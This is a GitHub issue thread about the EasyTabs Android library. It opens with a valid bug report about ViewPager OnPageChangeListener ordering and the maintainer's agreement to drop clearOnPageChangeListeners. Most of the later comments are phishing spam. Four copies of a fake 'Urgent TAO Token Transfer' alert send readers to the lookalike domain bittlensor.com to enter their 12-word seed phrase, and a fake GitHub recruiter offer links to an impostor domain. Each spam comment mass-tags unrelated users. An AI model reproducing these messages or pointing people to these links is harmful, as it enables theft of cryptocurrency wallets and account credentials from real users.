### ISSUE TITLE
Adding another OnPageChangeListener is corrupted

### ISSUE THREAD

**Issue by pawelsa** [loicteillard/EasyTabs#2]
When we add another OnPageChangeListener to the ViewPager it is not correctly working when the first change occurs. This is caused by this code : 
```
getViewPager().removeOnPageChangeListener(mOnPageChangeListener);
getViewPager().setCurrentItem(selected, true);
getViewPager().addOnPageChangeListener(mOnPageChangeListener);
```
Because we add our OnPageChangeListener as the second one, when the ViewPager method dispatchOnPageSelected(int position) is executed

```
for (int i = 0, z = mOnPageChangeListeners.size(); i < z; i++) {
    OnPageChangeListener listener = mOnPageChangeListeners.get(i);
        if (listener != null) {
            listener.onPageSelected(position);
        }
}
```
at first run easyTabs changeListener is notified, and then again easyTabs changeListener is notified, because we removed it, and added again. So our changeListener moved in the meantime from the second position in the list to the first one, and was skipped.

So I thought that I add my OnPageChangeListener first, but it still not working because you are doing `getViewPager().clearOnPageChangeListeners();`

I think that clearing should be removed and everything should be working fine. If not, why ?

I know that I can use `setPagerListener` but it adds to my code dependecy to your library, and I don't want it.

**Comment by loicteillard** [comment]
Yes i think you are right if i `remove getViewPager().clearOnPageChangeListeners();` it solves your problem if you don't want to rely on the internal `setPagerListener `.
Thank you, i will make this change later, anyway i have several things to do for this library, it needs more work for the next step (onconfigurationchanged-aware, icons, androidx...).

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @soone, @Averyjd12, @CharmCityCapital, @chaitanyakrishna, @SystemExecuteLLC, @rltp, @TheFrontlineGen

**Comment by nozelle** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @jameszwifter, @ColinWang1203, @0xknstntn, @0xhanh, @eicho410, @JiuBanA1, @Coin6logic

**Comment by 3asoftwareltda** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @stylophone, @0xTimo, @orban, @okplanbo, @NippunSharma, @Snedashkovsky, @borzunov

**Comment by nozelle** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @Lesliesibbs, @TomHeiber, @vvonchain, @stonegao, @Juanjoarlandis, @ndubuisx, @nschlemm

**Comment by pavana21** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
evazhang612, @barbiek1st, @mirfan899, @Dsantra92, @Trunglee12, @Lulzx, @diop, @sabetAI, @Swalyy, @0xDEADBEAT, @bartbarton99, @iamnmn9, @AliArmani3397, @akiszka, @bernardlim, @PiuPiuMedia, @ExtremelySunnyYK, @vincentweisser, @nikete, @locoalemao
